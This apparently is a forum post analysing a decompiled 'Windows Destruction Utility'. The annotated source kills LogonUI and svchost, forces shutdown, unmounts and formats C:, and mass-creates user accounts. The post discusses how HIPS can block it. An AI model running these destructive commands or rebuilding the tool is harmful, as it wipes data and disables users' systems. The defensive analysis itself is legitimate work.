解除挂载 C 盘（对应代码里的 unmc 命令，实际执行的是 `mountvol C: /d`）
不过这只是一个交互式命令行工具：所有破坏性动作（结束 LogonUI/svchost、重启/关机/注销、解除挂载 C 盘、批量新建用户、格式化 C 盘）都要有人在 `wdutil>` 提示符下手动输入对应命令才会执行。没有手动操作、也没有被其它程序通过标准输入喂命令来利用的话，它本身是没有破坏性的。
- using System;
- using System.Diagnostics;
- using Microsoft.VisualBasic.CompilerServices;
namespace wdutil
{
    // Token: 0x02000008 RID: 8
    //
    // Decompiled listing of "Windows Destruction Utility" (wdutil). The
    // Token/RID/RVA lines are decompiler output; the [StandardModule]
    // attribute and the Microsoft.VisualBasic.CompilerServices helpers
    // (Operators.ConditionalCompareObjectEqual / AddObject) show that the
    // original was a VB.NET Module using late-bound Object variables.
    //
    // There is no payload of its own here: every command either calls
    // Process.Kill on running processes or spawns a stock Windows command-line
    // tool (shutdown, mountvol, net, format). Nothing happens until someone
    // types a command at the "wdutil> " prompt, so the observable events for
    // detection are the child-process launches and the process terminations
    // listed above cm().
    [StandardModule]
    internal sealed class Module1
    {
        // Token: 0x06000010 RID: 16 RVA: 0x000021CC File Offset: 0x000003CC
        //
        // Entry point: prints the banner and hands control to promptp().
        // Control never returns here, because promptp() and cm() keep calling
        // each other (see the notes above cm()).
        [STAThread]
        public static void Main()
        {
            Console.Title = "Windows Destruction Utility";
            Console.WriteLine("Windows Destruction Utility");
            // NOTE(review): the inner quotes are unescaped as pasted, which does
            // not compile; presumably \"help\" in the real source. Left as-is.
            Console.WriteLine("Type "help" to see a list of commands.");
            Console.WriteLine();
            Console.WriteLine("For some commands you will need administrator permissions.");
            Console.WriteLine();
            Module1.promptp();
        }

        // Token: 0x06000011 RID: 17 RVA: 0x00002218 File Offset: 0x00000418
        //
        // Shows the prompt, reads one line from stdin into the shared `prompt`
        // field and dispatches it through cm(). Because input is plain
        // Console.ReadLine(), anything that can write to this process's stdin
        // (a pipe, not only a keyboard) can drive the commands.
        public static void promptp()
        {
            Console.Write("wdutil> ");
            // ReadLine() returns null at EOF; null matches none of the command
            // strings in cm(), so EOF presumably just re-prompts (and recurses)
            // forever.
            Module1.prompt = Console.ReadLine();
            Module1.cm();
        }

        // Token: 0x06000012 RID: 18 RVA: 0x00002238 File Offset: 0x00000438
        //
        // Command dispatcher. Compares the shared `prompt` field with each
        // command name in turn (VB `=` on Object with TextCompare=false, i.e.
        // case-sensitive binary comparison -- "HELP" matches nothing) and runs
        // the matching action. The `flagN` locals are the decompiler's
        // rendering of an If/ElseIf chain.
        //
        // Commands, in dispatch order (each spawned tool is named without a
        // path or extension, so it resolves through PATH):
        //   help      print the command list
        //   klu       Process.Kill() every process named LogonUI
        //   reboot    shutdown -r -t 0
        //   shutdown  shutdown -s -t 0
        //   logoff    shutdown -l -t 0
        //   svchostk  Process.Kill() every process named svchost
        //   unmc      mountvol C: /d   (removes the C: mount point)
        //   nu        net user <n> /add for n = 1 .. 9998
        //   fc        format C:
        //
        // Control-flow quirks worth knowing:
        //  - Every exception is caught, its message printed, and promptp() is
        //    called again -- which calls cm() again. The stack therefore grows
        //    by one promptp/cm pair per line of input and is never unwound.
        //  - All launches reuse the single static Process object `p`. klu and
        //    svchostk overwrite `p` with the last Process returned by
        //    GetProcessesByName, so after either of them the later commands
        //    set StartInfo on, and Start(), a Process object that was obtained
        //    for a foreign (killed) process rather than the one from the field
        //    initializer. NOTE(review): on .NET Core/5+ reading StartInfo of an
        //    associated Process throws InvalidOperationException (caught below,
        //    so those commands would only print an error); .NET Framework
        //    permits it -- confirm against the target runtime.
        public static void cm()
        {
            // VB compiles with integer overflow checking on by default; the
            // decompiler surfaces that as a checked block.
            checked
            {
                try
                {
                    bool flag = Operators.ConditionalCompareObjectEqual(Module1.prompt, "help", false);
                    if (flag)
                    {
                        Console.WriteLine("klu - Kills the LogonUI process");
                        Console.WriteLine("reboot - Emergency reboot");
                        Console.WriteLine("shutdown - Emergency shutdown");
                        Console.WriteLine("logoff - Emergency logoff");
                        Console.WriteLine("svchostk - Kill all svchost processes");
                        Console.WriteLine("unmc - Unmounts the C:\\ drive");
                        // Help text says 9999, but the nu loop below stops when
                        // the counter reaches 9999, so it creates 9998 accounts.
                        Console.WriteLine("nu - Creates 9999 users");
                        Console.WriteLine("fc - Formats C:");
                    }
                    else
                    {
                        bool flag2 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "klu", false);
                        if (flag2)
                        {
                            // Kill every LogonUI (the Windows logon/lock-screen
                            // UI, normally running as SYSTEM, so this needs
                            // elevation). Each iteration reassigns the shared
                            // `p`; see the note above cm(). Kill() on a process
                            // this user may not terminate throws Win32Exception,
                            // which lands in the catch below.
                            Process[] processesByName = Process.GetProcessesByName("LogonUI");
                            for (int i = 0; i < processesByName.Length; i++)
                            {
                                Module1.p = processesByName[i];
                                Module1.p.Kill();
                            }
                        }
                        else
                        {
                            bool flag3 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "reboot", false);
                            if (flag3)
                            {
                                // shutdown -r -t 0: restart with a zero-second
                                // timeout. stdout is captured and echoed; reading
                                // it to EOF before WaitForExit() is the order that
                                // avoids a pipe-buffer deadlock.
                                Module1.p.StartInfo.FileName = "shutdown";
                                Module1.p.StartInfo.Arguments = "-r -t 0";
                                Module1.p.StartInfo.UseShellExecute = false;
                                Module1.p.StartInfo.RedirectStandardOutput = true;
                                Module1.p.Start();
                                Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
                                Module1.p.WaitForExit();
                            }
                            else
                            {
                                bool flag4 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "shutdown", false);
                                if (flag4)
                                {
                                    // shutdown -s -t 0: power off with a
                                    // zero-second timeout; same launch pattern
                                    // as reboot.
                                    Module1.p.StartInfo.FileName = "shutdown";
                                    Module1.p.StartInfo.Arguments = "-s -t 0";
                                    Module1.p.StartInfo.UseShellExecute = false;
                                    Module1.p.StartInfo.RedirectStandardOutput = true;
                                    Module1.p.Start();
                                    Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
                                    Module1.p.WaitForExit();
                                }
                                else
                                {
                                    bool flag5 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "logoff", false);
                                    if (flag5)
                                    {
                                        // shutdown -l -t 0: log the current
                                        // user off; same launch pattern as
                                        // reboot.
                                        Module1.p.StartInfo.FileName = "shutdown";
                                        Module1.p.StartInfo.Arguments = "-l -t 0";
                                        Module1.p.StartInfo.UseShellExecute = false;
                                        Module1.p.StartInfo.RedirectStandardOutput = true;
                                        Module1.p.Start();
                                        Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
                                        Module1.p.WaitForExit();
                                    }
                                    else
                                    {
                                        bool flag6 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "svchostk", false);
                                        if (flag6)
                                        {
                                            // Kill every svchost instance. Most
                                            // host system services and run as
                                            // SYSTEM, so without elevation
                                            // Kill() throws Win32Exception for
                                            // them; with elevation, terminating
                                            // them typically brings the system
                                            // down. Also reassigns the shared
                                            // `p` (note above cm()).
                                            Process[] processesByName2 = Process.GetProcessesByName("svchost");
                                            for (int j = 0; j < processesByName2.Length; j++)
                                            {
                                                Module1.p = processesByName2[j];
                                                Module1.p.Kill();
                                            }
                                        }
                                        else
                                        {
                                            bool flag7 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "unmc", false);
                                            if (flag7)
                                            {
                                                // mountvol C: /d removes the C:
                                                // drive-letter mount point
                                                // (administrator rights needed).
                                                // Same launch pattern as reboot.
                                                Module1.p.StartInfo.FileName = "mountvol";
                                                Module1.p.StartInfo.Arguments = "C: /d";
                                                Module1.p.StartInfo.UseShellExecute = false;
                                                Module1.p.StartInfo.RedirectStandardOutput = true;
                                                Module1.p.Start();
                                                Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
                                                Module1.p.WaitForExit();
                                            }
                                            else
                                            {
                                                bool flag8 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "nu", false);
                                                if (flag8)
                                                {
                                                    // Loop until the counter equals
                                                    // 9999 (late-bound `=` on a
                                                    // boxed Int32), creating local
                                                    // accounts named "1" .. "9998"
                                                    // with `net user <n> /add`.
                                                    // No password is supplied, so
                                                    // each account presumably gets
                                                    // a blank password unless local
                                                    // policy rejects it. Each
                                                    // iteration spawns a new net
                                                    // process and waits for it.
                                                    // Because val1 is static and
                                                    // never reset, a second `nu` in
                                                    // the same session hits the
                                                    // break immediately and creates
                                                    // nothing.
                                                    for (;;)
                                                    {
                                                        bool flag9 = Operators.ConditionalCompareObjectEqual(Module1.val1, 9999, false);
                                                        if (flag9)
                                                        {
                                                            break;
                                                        }
                                                        Module1.p.StartInfo.FileName = "net";
                                                        Module1.p.StartInfo.Arguments = "user " + Module1.val1.ToString() + " /add";
                                                        Module1.p.StartInfo.UseShellExecute = false;
                                                        Module1.p.StartInfo.RedirectStandardOutput = true;
                                                        Module1.p.Start();
                                                        Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
                                                        Module1.p.WaitForExit();
                                                        Module1.val1 = Operators.AddObject(Module1.val1, 1);
                                                    }
                                                }
                                                else
                                                {
                                                    bool flag10 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "fc", false);
                                                    if (flag10)
                                                    {
                                                        // format C: with only stdout
                                                        // redirected; stdin is still
                                                        // this console, so format's
                                                        // own prompts go to the
                                                        // operator. On a running
                                                        // system format presumably
                                                        // refuses the volume Windows
                                                        // booted from -- the real
                                                        // effect is not visible from
                                                        // this listing.
                                                        Module1.p.StartInfo.FileName = "format";
                                                        Module1.p.StartInfo.Arguments = "C:";
                                                        Module1.p.StartInfo.UseShellExecute = false;
                                                        Module1.p.StartInfo.RedirectStandardOutput = true;
                                                        Module1.p.Start();
                                                        Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
                                                        Module1.p.WaitForExit();
                                                    }
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
                catch (Exception ex)
                {
                    // Catch-all: access-denied Win32Exceptions from Kill(),
                    // failed launches, etc. are reduced to one printed line and
                    // the prompt continues.
                    Console.WriteLine("Error: " + ex.Message);
                }
                // Re-prompt by recursion rather than a loop (see note above cm()).
                Module1.promptp();
            }
        }

        // Token: 0x04000008 RID: 8
        // Last line read from stdin (VB Object; null after EOF).
        private static object prompt;
        // Token: 0x04000009 RID: 9
        // Single Process object shared by every command; reassigned by klu and
        // svchostk to a process they killed (see the note above cm()).
        private static Process p = new Process();
        // Token: 0x0400000A RID: 10
        // Counter for the nu loop: a boxed Int32 starting at 1, incremented
        // with late-bound AddObject and never reset, so it persists across
        // commands in the same session.
        private static object val1 = 1;
    }
}
就是调用一下系统自带的命令行工具（shutdown、mountvol、net、format）和 Process.Kill 而已，程序本身没有任何自己实现的破坏逻辑。。。
@QVM360
卡饭的代码显示真是。。。（每行前面多了个「- 」，`Type "help"` 那行字符串里的转义引号也被吃掉了，直接复制下来是编译不过的）
想要拦截的话得设置 HIPS（火绒的系统加固也许可以试试）：它不走什么特殊 API，只是创建子进程（按 PATH 解析，正常情况下就是 shutdown.exe、mountvol.exe、net.exe、format.com）和结束进程（LogonUI、svchost），所以拦截点就是这些子进程的创建和进程终止行为。